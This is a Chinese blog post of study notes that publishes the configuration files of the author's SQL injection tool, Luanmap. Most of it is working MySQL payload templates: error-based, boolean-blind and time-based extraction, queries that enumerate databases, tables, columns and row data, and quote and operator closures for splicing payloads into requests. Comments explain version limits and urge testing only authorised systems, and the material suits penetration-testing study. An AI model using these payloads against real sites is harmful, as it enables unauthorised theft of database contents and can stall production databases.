Mysql注入姿势-Luanmap 配置文件

作者: Luan 分类: 学习笔记 发布时间: 2017-06-23 02:14

Mysql.xml(MySQL的SQL语句):

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <!--
      Luanmap MySQL payload templates. Each $$$[name]$$$ token is a placeholder the tool
      fills in before sending the request: [sql] is presumably one of the <sql> queries
      further down, the others are per-request values (character index, comparison value,
      sleep seconds, ...). 0x3a6c75616e3a is the hex literal ':luan:'; it brackets the leaked
      value so it can be located in the server's error text (and so a stray 'ok' elsewhere in
      the page is not mistaken for the probe result).
      NOTE(review): every error-based template relies on the target still echoing the
      offending value in its error message. The MySQL builds that stopped doing so differ per
      technique and are not recorded here - confirm against the target's reported version.
      NOTE(review): the time-based templates hold a database connection for the whole sleep()
      and the accompanying post recommends running them concurrently; keep [time_sec] and the
      request concurrency small against shared or production databases, and only use any of
      this against systems you are authorised to test.
    -->
    <!-- PROCEDURE ANALYSE must follow a complete SELECT, so this only fits an injection point
         at the end of a SELECT statement. The value is carried by the XPath error raised by
         extractvalue(). PROCEDURE ANALYSE was deprecated in MySQL 5.7.18 and removed in 8.0. -->
    <sqli>
        <name>error_procedure</name>
        <content>procedure analyse(extractvalue(1,concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a)),1)</content>
    </sqli>
    <!-- extractvalue() raises "XPATH syntax error: ':luan:...'" because the concat() result is not
         valid XPath. The quoted text is truncated to about 32 characters including the markers,
         so longer values have to be read in slices (e.g. wrap [sql] in mid()). -->
    <sqli>
        <name>error_extractvalue</name>
        <content>extractvalue(1,concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))</content>
    </sqli>
    <!-- Same mechanism and the same ~32 character limit as extractvalue(); kept as a fallback
         when one of the two functions is filtered. -->
    <sqli>
        <name>error_updatexml</name>
        <content>updatexml(1,concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a),1)</content>
    </sqli>
    <!-- Geometry-constructor family: feeding a non-geometry string to geometrycollection(),
         multipoint(), polygon(), multipolygon(), linestring() or multilinestring() yields an
         "Illegal non geometric ... value found during parsing" error that quotes the value.
         The nested (select * from(select * from(select ...)a)b) wrapping is part of the known
         payload shape - do not simplify it without re-testing. Only works on server builds that
         still echo the value in this error. -->
    <sqli>
        <name>error_geometrycollection</name>
        <content>geometrycollection((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_multipoint</name>
        <content>multipoint((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_polygon</name>
        <content>polygon((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_multipolygon</name>
        <content>multipolygon((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_linestring</name>
        <content>linestring((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_multilinestring</name>
        <content>multilinestring((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <!-- exp() of the bitwise complement of the subquery overflows DOUBLE; the resulting
         "DOUBLE value is out of range in 'exp(~((select ... from dual)))'" error quotes the
         evaluated value. Known to work on 5.5.5-era servers; newer builds no longer quote the
         value, so treat it as version-dependent. -->
    <sqli>
        <name>error_exp</name>
        <content>exp(~(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a))</content>
    </sqli>
    <!-- Classic duplicate-key trick: GROUP BY on concat(value, floor(rand(0)*2)) over a table
         with at least three rows (INFORMATION_SCHEMA.CHARACTER_SETS has plenty) makes the
         temporary-table insert collide, and "Duplicate entry ':luan:...:luan:1' for key
         'group_key'" leaks the value. The key text is cut at about 64 characters, so long values
         need slicing. rand(0) must stay seeded - an unseeded rand() makes the collision
         intermittent. -->
    <sqli>
        <name>error_floor</name>
        <content>(SELECT 6 FROM(SELECT COUNT(*),CONCAT(0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</content>
    </sqli>
    <!-- BIGINT overflow: !(subquery) is 0 or 1, and subtracting ~0 (18446744073709551615) from it
         overflows BIGINT UNSIGNED. The "... value is out of range in '(...)'" error quotes the
         expression with the subquery already evaluated. Needs MySQL >= 5.5.5 (strict overflow
         errors) and a build that still echoes the value. -->
    <sqli>
        <name>error_bigint</name>
        <content>!(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))x)-~0</content>
    </sqli>
    <!-- Boolean blind: true when the code point of character [sub_index] of the [sql] result is
         >= [char] (998 is just a "large" upper bound), which lets the tool bisect on [char].
         mid() is character-based and ord() returns the multi-byte code for a non-ASCII character;
         such codes exceed 998 and always test false, so this assumes single-byte data - go through
         hex() or cast to binary if the target holds UTF-8 text. -->
    <sqli>
        <name>blind_normal</name>
        <content>(ord(mid(($$$[sql]$$$)from($$$[sub_index]$$$)for(1)))between($$$[char]$$$)and(998))</content>
    </sqli>
    <!-- Time-based probe (presumably used to confirm the channel before time_bin): sleeps 2
         seconds when [bool_a] IN ([bool_b]) is true, 0 seconds otherwise. The
         (select(8)from(select(sleep(...)))a) wrapping yields a scalar so the template fits in an
         expression position. -->
    <sqli>
        <name>time_test_bin</name>
        <content>(select(8)from(select(sleep((($$$[bool_a]$$$)in($$$[bool_b]$$$))*2)))a)</content>
    </sqli>
    <!-- Time-based, one bit per request: takes binary digit [bin_sub_index] (counted from the
         right) of ord(character [sub_index]) and sleeps [time_sec] seconds if it is 1. bin() has
         no leading zeros, so an index past the top bit yields '' which should compare unequal to 1
         (a truncation warning, not an error) - i.e. a correct 0 - so 7 requests reconstruct any
         7-bit ASCII character. Bytes >= 0x80, and the multi-byte codes ord() returns for non-ASCII
         characters, need more bits. Because the bits are independent the requests can be issued
         in parallel, but each one holds a server connection for the sleep - bound concurrency. -->
    <sqli>
        <name>time_bin</name>
        <content>(select(8)from(select(sleep((mid(bin(ord(mid(($$$[sql]$$$)from($$$[sub_index]$$$)for(1))))from(-$$$[bin_sub_index]$$$)for(1))in(1))*$$$[time_sec]$$$)))a)</content>
    </sqli>
    <!-- Enumeration queries: each returns a single scalar so it can be embedded as [sql] above.
         Note the two substitution styles: in the INFORMATION_SCHEMA queries [db_name] and
         [table_name] are compared as string values and must be substituted as quoted or hex
         (0x...) literals, while in get_data_count / get_data_name the same names are bare
         identifiers in the FROM clause (back-quote them if they may contain reserved words or
         unusual characters). -->
    <sql>
        <name>get_database_count</name>
        <content>SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA</content>
    </sql>
    <!-- No ORDER BY: paging with LIMIT [index],1 assumes the server returns SCHEMATA in the same
         order on every request. -->
    <sql>
        <name>get_database_name</name>
        <content>SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT $$$[index]$$$,1</content>
    </sql>
    <!-- IN (...) with a single value is equivalent to the "=" used by the column queries below. -->
    <sql>
        <name>get_table_count</name>
        <content>SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN ($$$[db_name]$$$)</content>
    </sql>
    <sql>
        <name>get_table_name</name>
        <content>SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN ($$$[db_name]$$$) LIMIT $$$[index]$$$,1</content>
    </sql>
    <sql>
        <name>get_column_count</name>
        <content>SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=$$$[db_name]$$$ AND table_name=$$$[table_name]$$$</content>
    </sql>
    <sql>
        <name>get_column_name</name>
        <content>SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=$$$[db_name]$$$ AND table_name=$$$[table_name]$$$ LIMIT $$$[index]$$$,1</content>
    </sql>
    <sql>
        <name>get_data_count</name>
        <content>SELECT COUNT(*) FROM $$$[db_name]$$$.$$$[table_name]$$$</content>
    </sql>
    <!-- [order_by] must give a deterministic total order (a unique column); otherwise LIMIT
         paging can repeat or skip rows between requests. -->
    <sql>
        <name>get_data_name</name>
        <content>SELECT $$$[column_name]$$$ FROM $$$[db_name]$$$.$$$[table_name]$$$ ORDER BY $$$[order_by]$$$ LIMIT $$$[index]$$$,1</content>
    </sql>
    <!-- 0x6f6b is the string 'ok': the channel works if ':luan:ok:luan:' comes back. -->
    <sql>
        <name>test_injectable</name>
        <content>SELECT 0x6f6b</content>
    </sql>
    <!-- CURRENT_USER is the account MySQL actually authenticated as (the one whose privileges
         apply); USER() is the user@host the client presented. They differ for anonymous or
         wildcard-host accounts, which is why both are kept. -->
    <sql>
        <name>get_current_user</name>
        <content>SELECT CURRENT_USER</content>
    </sql>
    <sql>
        <name>get_current_user_2</name>
        <content>SELECT USER( )</content>
    </sql>
    <sql>
        <name>get_current_database</name>
        <content>SELECT DATABASE( )</content>
    </sql>
    <!-- SCHEMA() is a synonym for DATABASE(). Unlike its siblings this entry has no SELECT; it is
         still valid in the parenthesised expression positions the templates above use, but note
         the inconsistency if a template ever needs a scalar subquery. -->
    <sql>
        <name>get_current_database2</name>
        <content>schema()</content>
    </sql>
    <!-- @@VERSION and VERSION() return the same string; two spellings for filter evasion. -->
    <sql>
        <name>get_version</name>
        <content>SELECT @@VERSION</content>
    </sql>
    <sql>
        <name>get_version_2</name>
        <content>SELECT VERSION()</content>
    </sql>
</root>

都是比较常规的SQL语句,听了开发大牛建议,我决定还是先多学学数据库再去写工具。。
这些语句都是网上收集的,还有一些没有加进luanmap里面,比如Mysql5.6后多了两个记录数据库信息的表:https://www.exploit-db.com/docs/41274.pdf
这个xml里面比较新加进去的就是time_bin了:把注入结果按字符取ord()再用bin()转成二进制,每次请求只判断一个比特,7次请求就可以确定一个7位ASCII字符(字节>=0x80或者多字节字符的ord()值更大,需要更多比特)。这个是一个15年的文章里面看到的思路,别的数据库也是可以的。这个方法相对于二分法的优势是各个比特互不依赖、可以并发请求,速度很快;但每个请求都会占用一个数据库连接直到sleep结束,并发数和time_sec要控制好,否则容易把目标库拖垮。

payload.xml(闭合语句使用)

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <!-- Statement-closure pairs: the prefix is placed before a <sqli> template from Mysql.xml and
         the suffix after it. Pairs starting with a quote are for injection points inside a
         string literal - the prefix closes the literal and the suffix re-opens it so the
         application's own closing quote still matches; the unquoted pairs are for numeric
         contexts. The operator closures (^, mod, -, regexp) keep the original statement
         syntactically intact instead of commenting the rest of it out. -->
    <!-- 'abc' ^ (template) ^ '' : XOR passes the template's 0/1 result straight through, so this
         works for boolean blind as well as error/time based templates. -->
    <sqli>
        <prefix>'^</prefix>
        <suffix>^'</suffix>
    </sqli>
    <!-- Numeric-context variant of the XOR closure. -->
    <sqli>
        <prefix>^</prefix>
        <suffix></suffix>
    </sqli>
    <!-- NOTE(review): the trailing " mod ''" is "mod 0", which evaluates to NULL, so with this
         closure the template's truth value never reaches the WHERE clause. It is still fine for
         error- and time-based templates (the inner expression is evaluated), but it is not a
         usable closure for blind_normal. -->
    <sqli>
        <prefix>'mod </prefix>
        <suffix> mod'</suffix>
    </sqli>
    <!-- Arithmetic closure for a numeric value. NOTE(review): "---" is three minus signs, not a
         comment (MySQL's "--" comment needs a following space), so the suffix only parses if the
         original value follows it - verify how the tool splices this pair. -->
    <sqli>
        <prefix>-</prefix>
        <suffix>---</suffix>
    </sqli>
    <!-- 'abc' regexp (template) # ... : the "#" discards the rest of the line, including the
         application's closing quote, so the injection point must be on the last line of the
         statement (a newline resumes parsing). NOTE(review): a 0/1 template result becomes the
         pattern '0' or '1' matched against the original string, so the boolean outcome depends on
         the original value - suited to error/time-based templates rather than blind_normal. -->
    <sqli>
        <prefix>'regexp(</prefix>
        <suffix>)#</suffix>
    </sqli>
    <!-- Numeric-context variant of the regexp closure; same caveat about the 0/1 result. -->
    <sqli>
        <prefix>regexp(</prefix>
        <suffix>)</suffix>
    </sqli>
</root>

